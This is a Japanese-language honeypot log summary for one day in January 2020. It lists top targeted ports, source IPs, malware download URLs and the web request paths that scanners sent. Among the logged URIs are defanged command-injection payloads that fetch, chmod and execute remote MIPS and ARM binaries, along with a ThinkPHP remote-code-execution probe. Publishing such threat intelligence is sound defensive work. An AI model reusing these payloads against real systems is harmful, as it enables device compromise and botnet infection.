2020/01/11 の簡易分析となります。今回は、Microsoft SQL Serverで利用されているポート1433宛への通信が増加していました。

Honeypot簡易分析
<Honeytrap>

Local Port Top 10

LocalPort Count

1433 133228 件

445 214 件

3333 125 件

3389 68 件

6443 42 件

161 38 件

5094 38 件

139 27 件

Remote IP Top 10

RemoteIP Count

93[.]81[.]67[.]97 19329 件

125[.]227[.]26[.]167 18331 件

36[.]228[.]72[.]130 17251 件

190[.]77[.]63[.]145 16870 件

125[.]209[.]15[.]131 12950 件

177[.]7[.]73[.]136 11113 件

180[.]249[.]56[.]141 10843 件

187[.]53[.]123[.]169 7562 件

Malware

Malware Count

No Malware 134404 件

http://51[.]77[.]213[.]109/mips 5 件

http://185[.]62[.]189[.]18/jaws[.]sh 1 件

<WOWHoneypot>

URI Path Top 10

URI Path Count

/ 23 件

/admin/assets/js/views/login[.]js 16 件

/admin/i18n/readme[.]txt 8 件

/recordings/theme/main[.]css 8 件

/admin/config[.]php 8 件

/a2billing/customer/templates/default/css/menu[.]css 8 件

/TP/public/index[.]php 3 件

ip[.]ws[.]126[.]net:443 2 件

Remote IP Top 10

RemoteIP Count

77[.]247[.]108[.]77 40 件

77[.]247[.]108[.]119 8 件

146[.]71[.]79[.]77 6 件

50[.]192[.]246[.]94 5 件

106[.]12[.]123[.]62 4 件

78[.]151[.]188[.]234 3 件

112[.]25[.]224[.]2 3 件

222[.]186[.]19[.]221 2 件

All URI

URI Count

/ 22 件

/admin/assets/js/views/login[.]js 16 件

/admin/i18n/readme[.]txt 8 件

/recordings/theme/main[.]css 8 件

/admin/config[.]php 8 件

/a2billing/customer/templates/default/css/menu[.]css 8 件

ip[.]ws[.]126[.]net:443 2 件

/robots[.]txt 2 件

/muieblackcat 1 件

//phpMyAdmin/scripts/setup[.]php 1 件

//phpmyadmin/scripts/setup[.]php 1 件

//pma/scripts/setup[.]php 1 件

//myadmin/scripts/setup[.]php 1 件

//MyAdmin/scripts/setup[.]php 1 件

/TP/public/index[.]php 1 件

/TP/public/index[.]php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 1 件

/TP/public/index[.]php?s=captcha 1 件

/setup[.]cgi?next_file=afr[.]cfg&todo=syscmd&cmd=wget hxxp://91[.]208[.]184[.]71/Hentai[.]mips -O /var/tmp/Hentai[.]mips; chmod 777 /var/tmp/Hentai[.]mips; /var/tmp/Hentai[.]mips; rm -rf /var/tmp/Hentai[.]mips&curpath=/&currentsetting[.]htm=1 1 件

/card_scan_decoder[.]php?No=30&door=`wget hxxp://switchnets[.]net/hoho[.]arm7; chmod 777 hoho[.]arm7; [.]/hoho[.]arm7 linear` 1 件

/?XDEBUG_SESSION_START=phpstorm 1 件

/struts2-rest-showcase/orders[.]xhtml 1 件

/index[.]action 1 件

/index[.]do 1 件

<WOWHoneypot(https)>
URI Path Top 10

URI Path Count

/admin/assets/js/views/login[.]js 16 件

/admin/i18n/readme[.]txt 8 件

/recordings/theme/main[.]css 8 件

/admin/config[.]php 8 件

/a2billing/customer/templates/default/css/menu[.]css 8 件

/ 6 件

/ajax 1 件

/images/logo_pan_158[.]gif 1 件

Remote IP Top 10

RemoteIP Count

77[.]247[.]108[.]77 40 件

77[.]247[.]108[.]119 8 件

172[.]105[.]89[.]161 1 件

139[.]162[.]189[.]189 1 件

128[.]14[.]133[.]58 1 件

139[.]162[.]113[.]204 1 件

92[.]118[.]160[.]13 1 件

184[.]105[.]139[.]69 1 件

All URI

URI Count

/admin/assets/js/views/login[.]js 16 件

/admin/i18n/readme[.]txt 8 件

/recordings/theme/main[.]css 8 件

/admin/config[.]php 8 件

/a2billing/customer/templates/default/css/menu[.]css 8 件

/ 6 件

/ajax 1 件

/images/logo_pan_158[.]gif 1 件

/global-protect/portal/css/login[.]css 1 件